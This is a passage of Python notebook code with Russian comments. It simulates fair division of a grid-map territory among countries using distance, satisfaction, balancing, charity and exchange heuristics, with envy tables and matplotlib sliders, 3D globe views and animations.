self.sphere = sphere # есть ли искривление поверхности?
self.radius = radius # радиус искривления
self.z = [] # третья координата(от северного полюса)
self.inline = 0 # счётчик inline для matplotlib
self.angle1 = 30 # угол для 3д отображения
self.angle2 = 30 # второй угол для 3д отбражения
self.list_exchange = [] # сосед из страны i стране j который может ей уйти
self.map_exchange = [] # карта соседей каждого участка
self.started = [] # массив участков стран для промежуточного вычесления расстояний
self.exchanged = [{}, {}, {}] # словари с информацией о статистике обмена ункцией exchange
self.percent = percent # является ли модель процентной
self.full = [] # для процентной модели, чему равны 100% уровня удовлетворённости стран
if self.sphere: # заполнение self.z
for i in range(row):
self.z.append([])
for j in range(column): # расчёт третьей координаты с учётом искривления
self.z[i].append(self.radius - pow(pow(self.radius, 2) - ((pow(i - row/2 + 0.5, 2) + pow(j - column/2 + 0.5,2))), 0.5))
else:
for i in range(row):
self.z.append([])
for j in range(column):
self.z[i].append(0)
### ПОЛЬЗОВАТЕЛЬСКИЕ ФУНКЦИИ ###
## РЕДАКТИРОВАНИЕ КАРТЫ ##
# ДОБАВЛЕНИЕ СТРАНЫ (название, приоритеты, границы пользы)
def add_country(self, name, priorities, dis):
self.countries.append([priorities, 0, [], [], []]) # приоритеты удовлетворение корни территоии, eez
self.ind.append(0) # добавление индикатора
self.full.append(0)
self.names.append(name) # добавление имени
self.d.append(dis) # добавление границ пользы
for i in range(len(self.unos)):
for j in range(len(self.unos[0])): # добавление элемента дистанции и элемента пользы в участки
self.unos[i][j][3].append(0)
self.unos[i][j][4].append(0)
self.dist_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1) # добавление карты дистанции
self.sati_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1) # добавление карты пользы
# ДОБАВЛЕНИЕ РЕСУРСА НА НЕСКОЛЬКО УЧАСТКОВ(номер ресурса, первая строка, первый столбец, последняя строка,
#последний столбец)
def add_resources(self, n, ff, fl, lf, ll, r = 1):
for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Resource " + str(n)):
for j in range(fl, ll+1):
self.add_resource(n, i, j, r) # редактирование каждого участка по очереди
# ДОБАВЛЕНИЕ РЕСУРСА НА УЧАСТОК (номер ресурса, строка участка, столбец участка)
def add_resource(self, n, f, l, r = 1):
self.unos[f][l][0][n] = r # изменение индикатора этого ресурса у участков
self.res_map[n][f][l] *= (1 + r) # изменение карты ресурса
# ОБЪЯВЛЕНИЕ УЧАСТКОВ РЕАЛЬНЫМИ (первая строка, первый столбец, последняя строка, последний столбец)
def add_reals(self, ff, fl, lf, ll): #ff fl - first coordinate, lf ll - last coordinate
for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Real"):
for j in range(fl, ll+1):
self.add_real(i, j) # редактирование каждого участка по очереди
# ОБЪЯВЛЕНИЕ УЧАСТКА РЕАЛЬНЫМ (строка участка, столбец участка)
def add_real(self, f, l):
self.unos[f][l][2] = 0 # изменение номера принадлежности стране
for k in range(len(self.res_map)):
self.res_map[k][f][l] = 1 # изменение карт ресурсов
if [f, l] not in self.transferable:
self.transferable.append([f, l]) # добавление участка в множество свободных
# ОБЪЯВЛЕНИЕ УЧАСТКОВ КОРНЯМИ СТРАНЫ(номер страны, первая строка, первый столбец, последняя строка, последний столбец)
def add_roots(self, n, ff, fl, lf, ll): # ff, fl - 1st coor, lf, ll - 2nd coor
for i in tqdm_notebook(range(ff, lf+1), total= lf + 1 - ff, desc="Add Root of " + self.names[n]):
for j in range(fl, ll+1):
self.add_root(n, i, j) # редактирование каждого участка по очереди
# ОБЪЯВЛЕНИЕ УЧАСТКА КОРНЕМ СТРАНЫ(номер страны, строка участка, столбец участка)
def add_root(self, n, f, l):
if self.unos[f][l][2] == 0: # только если участок уже реален
self.transferable.remove([f, l]) # убрать из множества передаваемых участков
self.countries[n][2].append([f, l]) # добавить в множество корней страны
self.unos[f][l][2] = n + 1 # изменить у участка номер принадлежности стране
self.unos[f][l][1] = True # изменить у участка индикатор корня или еез
for k in range(len(self.countries)): # изменить для всех карт недоступность участка
if (k != n):
self.dist_map[k][f][l] = -2
self.sati_map[k][f][l] = -2
else:
self.dist_map[k][f][l] = 0
self.sati_map[k][f][l] = 0
## ПРЕДОБРАБОТКА КАРТЫ ##
# РАССЧИТЫВАЕТ РАССТОЯНИЯ И ПОЛЬЗЫ УЧАСТКОВ И РАСЧЁТ НАЧАЛЬНОГО УДОВЛЕТВОРЕНИЯ СТРАН
def started_pack(self, d = 52.4):
for k in range(len(self.countries)):
self.started.append([])
for i, j in self.countries[k][2]:
z = self.z[i][j]
if(((i == 0) or (self.unos[i-1][j][2] != k + 1)) or ((i == len(self.unos) - 1) or (self.unos[i+1][j][2] != k + 1)) or
((j == 0) or (self.unos[i][j-1][2] != k + 1)) or ((j == len(self.unos[0]) - 1) or (self.unos[i][j+1][2] != k + 1))):
self.started[k].append([i, j, z])
for i in tqdm_notebook(range(len(self.unos)), total=len(self.unos), desc="Started pack"):
for j in range(len(self.unos[0])):
if (self.unos[i][j][1] == False) and (self.unos[i][j][2] >= 0): # если участок может быть передан
for k in range(len(self.countries)):
dista = self.dist(i, j, k) # рассчёт его полезности и расстония до страны k
self.unos[i][j][3][k] = dista # изменение множества расстояний учатска
self.dist_map[k][i][j] = dista # изменение карты расстояний
if min(self.unos[i][j][3]) > d:
for k in range(len(self.countries)):
satis = self.sati(i, j, k)
self.unos[i][j][4][k] = satis # изменение множества пользы учатска
self.sati_map[k][i][j] = satis # изменение карты польз
if self.percent:
self.full[k] += satis
else:
self.countries[k][1] -= satis # изменение уровня удовлетворённости страны
else:
country = self.unos[i][j][3].index(min(self.unos[i][j][3]))
self.belong(i, j, country, 'EEZ '); # передача участка стране
self.unos[i][j][1] = True; # изменение идентификатора корня или еез
self.transferable.remove([i, j]) # убирание из списка передаваемых
self.countries[country][4].append([i, j]) # добавление в список еез страны
self.unos[i][j][5] = True # изменение идентификатора еез
if self.percent:
for i in range(len(self.unos)):
for j in range(len(self.unos[0])):
for k in range(len(self.countries)):
self.unos[i][j][4][k] = self.unos[i][j][4][k] / self.full[k] * 100
if self.sati_map[k][i][j] > 0:
self.sati_map[k][i][j] = self.sati_map[k][i][j] / self.full[k] * 100
if self.percent == False:
self.change_sati.append(np.array(self.countries)[:, 1].astype(int).tolist())# добавление первого множжества удовлетворённостей
else:
self.change_sati.append([round(x, 3) for x in np.array(self.countries)[:, 1]]) # добавление первого множжества удовлетворённостей
self.start_map = np.array(self.unos)[:, :, 2].astype(int).tolist() # добавление стартовой карты и стартовой карты с расширенной расцветкой
self.start_map_diff = (np.array(self.unos)[:, :, 2].astype(int) * 3 - 2 * np.sign(np.array(self.unos)[:, :, 2].astype(int))).tolist()
self.started = []
## ФУНКЦИИ ДЛЯ НАЧАЛЬНОГО РАЗДЕЛЕНИЯ КАРТЫ ##
# ФУНКЦИЯ БЛИЗОСТИ отдаёт участки ближайшим странам
def func_distance(self):
for elem in tqdm_notebook(self.transferable, total= len(self.transferable), desc="Func Distance"):
self.belong(elem[0], elem[1], self.near(elem[0], elem[1]), 'Func Distance ') # передача участка ближайшей стране
self.make_exch() # формируем карты для допустимого обмена
# ФУНКЦИЯ ПОЛЬЗЫ отдаёт участки странам, которым они принесут больше пользы
def func_satisfation(self):
for elem in tqdm_notebook(self.transferable, total= len(self.transferable), desc="Func Satisfaction"):
self.belong(elem[0], elem[1], self.most_sati(elem[0], elem[1]), 'Func Satisfaction ') # передача участка стране, которой он нужнее
self.make_exch() # формируем карты для допустимого обмена
# ФУНКЦИЯ СПРАВЕДЛИВОСТИ отдаёт самой бедной стране самый выгодный для неё участок и так по кругу
def func_balance(self):
empty = 0 # индикатор того, что странам больше нечего передавать
for k in tqdm_notebook(range(len(self.transferable) + len(self.countries) - 1), #пока не закончатся свободные участки
total= len(self.transferable) + len(self.countries) - 1, desc="Func Balance"):
if empty == 0: # если есть ещё что передавать
min_coun = self.min_sat()[1] # находим страну с наименьшим уровнем удовлетворённости
max_sati = 0 # максимально возможная прибавка удовлетворённости
maxf = 0 # первая координата участка
maxl = 0 # вторая координата участка
for elem in self.transferable: # для каждого свободного участка
i = elem[0] # первая координата
j = elem[1] # вторая координата
if (((i != 0 and (self.unos[i - 1][j][2] == min_coun + 1)) or # есть ли у участка сосед из той страны
(j != 0 and (self.unos[i][j - 1][2] == min_coun + 1)) or
(j != len(self.unos[0]) - 1 and (self.unos[i][j + 1][2] == min_coun + 1)) or
(i != len(self.unos) - 1 and (self.unos[i + 1][j][2] == min_coun + 1)))
and self.unos[i][j][2] == 0 and (max_sati < self.unos[i][j][4][min_coun] or # лучше ли этот участок
(max_sati == self.unos[i][j][4][min_coun] and
self.unos[maxf][maxl][3][min_coun] > self.unos[i][j][3][min_coun]))):
max_sati = self.unos[i][j][4][min_coun] # теперь он лучший вариант
maxf = i # записываем его первую координату
maxl = j # записываем его вторую координату
if max_sati != 0: # если польза больше нуля, то отдаём
self.belong(maxf, maxl, min_coun, 'Func Balance ')
elif self.ind.count(0) > 1: # если польза нулевая, то переводим индикатор заполненности
self.ind[min_coun] = 1
else: # если все индикаторы включены, то обмен закончен
empty = 1 # переводим индикатор окончания обмена
for element in self.transferable: # передаём оставшиеся участки ближайшим странам
if self.unos[element[0]][element[1]][2] == 0:
self.belong(element[0], element[1], self.near(element[0], element[1]), 'Func Balance ')
for i in range(len(self.ind)): # возвращаем индикаторы self.ind в нулевое положение
self.ind[i] = 0
self.make_exch() # формируем карты для допустимого обмена
## ФУНКЦИИ ДОПОЛНИТЕЛЬНОЙ ОБРАБОТКИ
# СПРАВЕДЛИВОСТЬ УВЕЛИЧИВАЕТ МИНИМАЛЬНУЮ УДОВЛЕТВОРЁННОСТЬ СТРАН ПОСРЕДСТВОМ CHARITY БОГАТЫЕ ОТДАЮТ БЕДНЫМ
def charity(self):
last_step = np.array(self.countries)[:, 1].astype(float) # запоминание нынешнего состония уровня удовлетворённости
self.total_charity() # передаём участки от всех "богатых" ко всем "бедным"
while ((np.array(self.countries)[:, 1].astype(float) != last_step).sum() != 0): # повтораяем пока меняются уровни удовлетворения
last_step = np.array(self.countries)[:, 1].astype(float)
self.total_charity()
# ОБМЕН ПЫТАЕТСЯ ОБМЕНЯТЬСЯ МЕЖДУ ЛЮБЫМИ ДВУМЯ СТРАНАМИ НЕ УМЕНЬШАЯ УДОВЛЕТВОРЁННОСТЬ НИ ОДНОЙ ИЗ НИХ
#количество случайных участков между которыми будет происходить обмен, количество попыток для каждой пары стран
def exchange(self, sides = [8, 6, 4], attempts = 16, safe = False):
succes = 1 # счётчик успешных обменов
while succes != 0: # пока обмены происходят
if safe:
self.make_exch() # формируем карты для допустимого обмена
succes = 0 # обнуляем счётчик обменов
for i in range(len(self.countries)):
for j in range(len(self.countries)): # для всех пар стран, между которыми возможен обмен
if i != j and len(self.list_exchange[i][j]) != 0 and len(self.list_exchange[j][i]) != 0 :
ntry = 0 # обнуляем счётчик неудачных попыток
result = 0 # обнуляем индикатор успеха обмена
while ntry != attempts: # пока счётчик неудачных попыток не достиг количества попыток
result = self.exch(i, j, sides[0], sides[0], ntry) #счётчик успеха = попытка обмена случайными участками
if not result: # если не удалось, повышаем счётчик неудачных попыток
ntry += 1
else: # иначе обнуляем счётчик неудачных попыток и включаем индикатор успешных обменов
ntry = 0
succes = 1
for elem in sides[1:]:
ntry = 0 # обнуляем счётчик неудачных попыток
result = 0 # обнуляем индикатор успеха обмена
while ntry != attempts: # пока счётчик неудачных попыток не достиг количества попыток
result = self.exch(i, j, elem, 2 * sides[0] - elem, ntry) #счётчик успеха = попытка обмена случайными участками
if not result: # если не удалось, повышаем счётчик неудачных попыток
ntry += 1
else: # иначе обнуляем счётчик неудачных попыток и включаем индикатор успешных обменов
ntry = 0
succes = 1
ntry = 0 # обнуляем счётчик неудачных попыток
result = 0 # обнуляем индикатор успеха обмена
while ntry != attempts: # пока счётчик неудачных попыток не достиг количества попыток
result = self.exch(i, j, 2 * sides[0] - elem, elem, ntry) #счётчик успеха = попытка обмена случайными участками
if not result: # если не удалось, повышаем счётчик неудачных попыток
ntry += 1
else: # иначе обнуляем счётчик неудачных попыток и включаем индикатор успешных обменов
ntry = 0
succes = 1
# КОМБИНАЦИЯ СПРАВЕДЛИВОСТИ И ОБМЕНА
#количество случайных участков для функции exchange между которыми будет происходить обмен, количество попыток обмена
def char_exch(self, sides = [8, 6, 4], attempts = 16, safe = False):
last_step = np.array(self.countries)[:, 1].astype(float) # запоминание нынешнего состония уровня удовлетворённости
self.charity() # передаём участки от "богатых" "бедным"
self.exchange(sides, attempts, safe) # производим взаимовыгодный обмен
while ((np.array(self.countries)[:, 1].astype(float) != last_step).sum() != 0): # пока меняются уровни удовлетворённости
last_step = np.array(self.countries)[:, 1].astype(float) # запоминание нынешнего уровня удовлетворённостей
self.charity() # передаём участки от "богатых" "бедным"
self.exchange(sides, attempts, safe) # производим взаимовыгодный обмен
def connectedness(self):
self.transferable = []
for i in range(len(self.countries)):
root = self.countries[i][2] + self.countries[i][4]
old = []
new = []
for k in tqdm_notebook(range(len(self.countries[i][2]) + len(self.countries[i][3]) + len(self.countries[i][4])), #пока не закончатся свободные участки
total= (len(self.countries[i][2]) + len(self.countries[i][3]) + len(self.countries[i][4])), desc="Connectedness" + self.names[i]):
if root != []:
elem = [root[0][0] - 1, root[0][1]]
if (elem[0] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0], root[0][1] - 1]
if (elem[1] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0] + 1, root[0][1]]
if (elem[0] < len(self.unos)) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [root[0][0], root[0][1] + 1]
if (elem[1] < len(self.unos[0])) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
root = root[1:]
else:
if new != []:
if new[0] not in old:
elem = [new[0][0] - 1, new[0][1]]
if (elem[0] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0], new[0][1] - 1]
if (elem[1] >= 0) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0] + 1, new[0][1]]
if (elem[0] < len(self.unos)) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
elem = [new[0][0], new[0][1] + 1]
if (elem[1] < len(self.unos[0])) and ((self.unos[elem[0]][elem[1]][2] - 1) == i) and (self.unos[elem[0]][elem[1]][1] == False) and (elem not in old) and (elem not in new):
new.append(elem)
old.append(new[0])
new = new[1:]
copy_terr = copy.deepcopy(self.countries[i][3])
for elem in copy_terr:
if elem not in old:
self.transferable.append(elem)
self.countries[i][1] -= (2 - self.percent) * self.unos[elem[0]][elem[1]][4][i]
self.unos[elem[0]][elem[1]][2] = 0
self.countries[i][3].remove([elem[0], elem[1]])
## ФУНКЦИИ ДЛЯ ВЫВОДОВ
# ПИШЕТ СТАТИСТИКУ РЕЗУЛЬТАТА ФУНКЦИИ exchange
def exchange_info(self):
di0 = sorted(new.exchanged[0].items(), key=lambda item: -item[1])
di1 = sorted(new.exchanged[1].items(), key=lambda item: -item[1])
di2 = sorted(new.exchanged[2].items(), key=lambda item: -item[1])
print('Количество участков в настройках и количество таких обменов')
for i in range(len(di0)):
print(di0[i][0], di0[i][1])
print('Количество участков от каждой страны, учавствующих в обмене и количество таких обменов')
for i in range(len(di1)):
print(di1[i][0], di1[i][1])
print('Количество участков, учавствующих в обмене и количество таких обменов')
for i in range(len(di2)):
print(di2[i][0], di2[i][1])
# ПИШЕТ ТАБЛИЦУ ЗАВИСТИ ГДЕ СТРАНА ИЗ СТРОКИ ЗАВИДУЕТ СТРАНЕ ИЗ СТОЛБЦА
def envy_free(self):
env = [['']] # таблица зависти
for i in range(len(self.countries)):
env[0].append(self.names[i]) # добавляем в таблицу верхнюю строку названий стран
for i in range(len(self.countries)):
env.append([self.names[i]]) # добавляем в таблицу левый столбец названий стран
for j in range(len(self.countries)):
env[i + 1].append(self.envy(i, j)) # заполняем таблицу
max_len = max([len(str(e)) for r in env for e in r])
for row in env:
print(*list(map('{{:>{length}}}'.format(length= max_len).format, row))) # выводим построчно таблицу
# ПИШЕТ ТЕКУЩУЮ УДОВЛЕТВОРЁННОСТЬ СТРАН
def countries_sati(self):
sat_c = [] # список удовлетворённостей стран
for i in range(len(self.countries)):
sat_c.append([self.names[i], self.countries[i][1]]) # заполняем список удовлетворённостей
max_len = max([len(str(e)) for r in sat_c for e in r])
for row in sat_c:
print(*list(map('{{:>{length}}}'.format(length= max_len).format, row))) #выводим список удовлетворённостей
# СЛАЙДЕР ИЗМЕНЕНИЯ КАРТЫ (рассматриваемый интервал, гистограмма, расширенная расцветка)
def slider(self, interval = "All", hist = False, diff = True):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
def update_iteration(value): # обновление итерации для слайдера
update_map(iteration = value['new'])
def update_map(iteration = 0): # обновлеине карты
clear_output(wait=True) # очистка вывода
now_map = copy.deepcopy(start_map) # начальная карта (в последствии к ней и будут применяться изменения)
if diff: # если расширенная расцветка
for i in range(iteration):
now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] * 3 - (change_map[i][3] == "EEZ ") # изменяем карту
else: # если не расширенная
for i in range(iteration):
now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] # изменяем карту
plt.imshow(now_map, cmap = cm.viridis) # отображение карты
plt.show()
if hist: # если гистограмма
fig = plt.figure(figsize=(5, 5)) # настройка гистограммы
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[start + iteration][i], self.change_sati[start + iteration][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([i for i in range(len(self.names))], self.change_sati[start+iteration],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
slider = widgets.IntSlider(iteration, min = 0, max = len(change_map)) # слайдер итераций
label = widgets.Label(value = 'Iterarion ' + str(iteration) + ((start!=0)*('(' + str(start + iteration) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
display(slider, label)
slider.observe(update_iteration, names = 'value')
#настройка рассматриваемого интервала
if interval == "All": # если интервал весь
start = 0
end = len(self.change_map)
elif isinstance(interval[0], int): # если интервал задан численно
if interval[0] < 0:
interval[0] += len(self.change_map)
if interval[1] <= 0:
interval[1] += len(self.change_map)
start = interval[0]
end = interval[1]
else: # если интервал задан названиями функций
start = 0
end = len(self.change_map)
for i in range(len(self.change_map)):
if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
start = i
break
for i in range(len(self.change_map) - 1, -1, -1):
if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
end = i + 1
break
if diff: # если расширенная расцветка
start_map = copy.deepcopy(self.start_map_diff) # начальная карта
for i in range(start): # применяем изменения
start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2] * 3 - (self.change_map[i][3] == "EEZ ")
else: # если расцветка обычная
start_map = copy.deepcopy(self.start_map) # начальная карта
for i in range(start): # применяем изменения
start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2]
change_map = self.change_map[start:end] # формируется список изменений
plt.imshow(start_map, cmap = cm.viridis) # отображение карты
plt.show()
if hist: # если нужна гистограмма
fig = plt.figure(figsize=(5, 5)) # формирование гистограммы
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[start][i], self.change_sati[start][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([i for i in range(len(self.names))], self.change_sati[start],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
slider = widgets.IntSlider(0, min = 0, max = len(change_map)) # слайдер итераций
label = widgets.Label(value = 'Iterarion 0' + ((start!=0)*('(' + str(start) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
display(slider, label)
slider.observe(update_iteration, names = 'value')
#3Д ОТОБРАЖЕНИЕ (интервал, расширенная настройка, пропуск участков, размер участков)
def globus(self, interval = "All", diff = False, interv = 15, scale = 1.5):
if self.inline >= 1: # настройка matplotlib
for i in range(self.inline):
%matplotlib notebook
%matplotlib notebook
self.inline = 0
#настройка рассматриваемого интервала
if interval == "All": # если интервал весь
start = 0
end = len(self.change_map)
elif isinstance(interval[0], int): # если интервал задан численно
if interval[0] < 0:
interval[0] += len(self.change_map)
if interval[1] <= 0:
interval[1] += len(self.change_map)
start = interval[0]
end = interval[1]
else: # если интервал задан названиями функций
start = 0
end = len(self.change_map)
for i in range(len(self.change_map)):
if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
start = i
break
for i in range(len(self.change_map) - 1, -1, -1):
if self.change_map[i][3][:-1] in interval or self.change_map[i][3][:8] == 'Exchange' and 'Exchange' in interval:
end = i + 1
break
if diff: # если расширенная расцветка
start_map = copy.deepcopy(self.start_map_diff) # начальная карта
for i in range(start): # применяем изменения
start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2] * 3 - (self.change_map[i][3] == "EEZ ")
else: # если расцветка обычная
start_map = copy.deepcopy(self.start_map) # начальная карта
for i in range(start): # применяем изменения
start_map[self.change_map[i][0]][self.change_map[i][1]] = self.change_map[i][2]
change_map = self.change_map[start:end] # формируется список изменений
x = [] # первая координата
y = [] # вторая координата
z = [] # третья координата
colors = [] # массив цветов точек
maxi = max(len(self.unos), len(self.unos[0]), max(max(self.z)) - min(min(self.z))) # максимальная длина координат
if diff: # рассчёт нужного смещения для размещения посередине
for i in range(0, len(self.unos), interv):
for j in range(0, len(self.unos[0]), interv):
if self.unos[i][j][2] > 0:
x.append((maxi - len(self.unos))/2 + i)
y.append((maxi - len(self.unos[0]))/2 + j)
z.append((maxi + max(max(self.z)))/2 - self.z[i][j])
colors.append(start_map[i][j])
else:
for i in range(0, len(self.unos), interv):
for j in range(0, len(self.unos[0]), interv):
if self.unos[i][j][2] > 0:
x.append((maxi - len(self.unos))/2 + i)
y.append((maxi - len(self.unos[0]))/2 + j)
z.append((maxi + max(max(self.z)))/2 - self.z[i][j])
colors.append(start_map[i][j])
fig = plt.figure(figsize=(5,5)) # настройка трёхмерной модели
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
ax.set_zlabel('Z axis')
ax.set_xlim([0, maxi])
ax.set_ylim([0, maxi])
ax.set_zlim([0, maxi])
ax.scatter(x, y, z, c=colors, cmap=cm.viridis, s = 2 * interv * scale)
ax.view_init(30, 30)
plt.show()
def update_plot(angle1 = 30, angle2 = 30): # функция обновления угла
self.angle1 = angle1
self.angle2 = angle2
ax.view_init(angle1, angle2)
fig.canvas.draw_idle()
angle1_slider = widgets.IntSlider(30, min = -180, max = 180) # слайдер первого угла
display(angle1_slider)
angle2_slider = widgets.IntSlider(30, min = -180, max = 180) # слайдер второго угла
display(angle2_slider)
slider = widgets.IntSlider(0, min = 0, max = len(change_map)) # слайдер итерации
label = widgets.Label(value = 'Iterarion 0' + ((start!=0)*('(' + str(start) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
display(slider, label)
# функции обновления для слайдеров
def update_angle1(value):
update_plot(angle1 = value['new'], angle2 = self.angle2)
def update_angle2(value):
update_plot(angle1 = self.angle1, angle2 = value['new'])
def update_iteration(value): # обновление итерации
update_map(iteration = value['new'])
def update_map(iteration = 0): # обновлеине карты
clear_output(wait=True) # очистка вывода
now_map = copy.deepcopy(start_map) # начальная карта (в последствии к ней и будут применяться изменения)
if diff: # если расширенная расцветка
for i in range(iteration):
now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] * 3 - (change_map[i][3] == "EEZ ") # изменяем карту
else: # если не расширенная
for i in range(iteration):
now_map[change_map[i][0]][change_map[i][1]] = change_map[i][2] # изменяем карту
colors = []
for i in range(0, len(self.unos), interv):
for j in range(0, len(self.unos[0]), interv):
if self.unos[i][j][2] > 0:
colors.append(now_map[i][j])
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
ax.set_zlabel('Z axis')
ax.set_xlim([0, maxi])
ax.set_ylim([0, maxi])
ax.set_zlim([0, maxi])
ax.scatter(x, y, z, c=colors, cmap=cm.viridis, s = 2 * interv * scale)
ax.view_init(self.angle1, self.angle2)
plt.show()
angle1_slider = widgets.IntSlider(self.angle1, min = -180, max = 180)
display(angle1_slider)
angle2_slider = widgets.IntSlider(self.angle2, min = -180, max = 180)
display(angle2_slider)
slider = widgets.IntSlider(iteration, min = 0, max = len(change_map)) # сам слайдер
label = widgets.Label(value = 'Iterarion ' + str(iteration) + ((start!=0)*('(' + str(start + iteration) + ')')) + ' of ' + str(len(change_map)) + (' ' + change_map[slider.value - 1][3]) * (slider.value != 0))
display(slider, label)
def update_plot(angle1 = 30, angle2 = 30):
self.angle1 = angle1
self.angle2 = angle2
ax.view_init(angle1, angle2)
fig.canvas.draw_idle()
def update_angle1(value):
update_plot(angle1 = value['new'], angle2 = self.angle2)
def update_angle2(value):
update_plot(angle1 = self.angle1, angle2 = value['new'])
angle1_slider.observe(update_angle1, names = 'value')
angle2_slider.observe(update_angle2, names = 'value')
slider.observe(update_iteration, names = 'value')
angle1_slider.observe(update_angle1, names = 'value')
angle2_slider.observe(update_angle2, names = 'value')
slider.observe(update_iteration, names = 'value')
# ТЕКУЩАЯ КАРТА (расширенная расцветка)
def terr(self, diff = True):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
if (diff): # отображение карты
plt.imshow(list(map(lambda a, b, c: list(map(lambda x, y, z: 2*x*(x>0) + x - 2 * y + z, a, b, c)),
np.array(self.unos)[:, :, 2].astype(int), np.array(self.unos)[:, :, 1].astype(int),
np.array(self.unos)[:, :, 5].astype(int))), cmap = cm.viridis)
else:
plt.imshow(np.array(self.unos)[:, :, 2].astype(int), cmap = cm.viridis)
if self.percent == False:
plt.title(str(len(self.change_map)) + ' ' + str(np.array(self.countries)[:, 1].astype(int)))
else:
plt.title(str(len(self.change_map)) + ' ' + str([round(x, 3) for x in np.array(self.countries)[:, 1]]))
plt.show()
# АНИМАЦИЯ ИЗМЕНЕНИЯ КАРТЫ необязательно указывать
#(расширеная расцветкаб длительность каждого кадра в милисекундах, пропуск кадров, повторять анимацию?)
def anim_terr(self, diff = True, interval = 200, x = 100, repeat = False):
if self.inline >= 1: # настройка matplotlib
for i in range(self.inline):
%matplotlib notebook
%matplotlib notebook
self.inline = 0
if diff: # анимация
f = plt.figure()
ax = f.gca()
im = copy.deepcopy(self.start_map_diff)
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
def function_for_animation(frame_index):
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2] * 3 - (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] == 'EEZ '))
image.set_data(im)
ax.set_title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3]
+ str(min(frame_index * x, len(self.change_map) - 1)) + ' '
+ str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(f, function_for_animation, interval=interval,
frames=(((len(self.change_map) - 1) // x) + 2), repeat = repeat, blit=True)
else:
f = plt.figure()
ax = f.gca()
im = copy.deepcopy(self.start_map)
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
def function_for_animation(frame_index):
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2]
image.set_data(im)
ax.set_title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3]
+ str(min(frame_index * x, len(self.change_map) - 1)) + ' '
+ str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(f, function_for_animation, interval=interval,
frames=(((len(self.change_map) - 1) // x) + 2), repeat = repeat, blit = True)
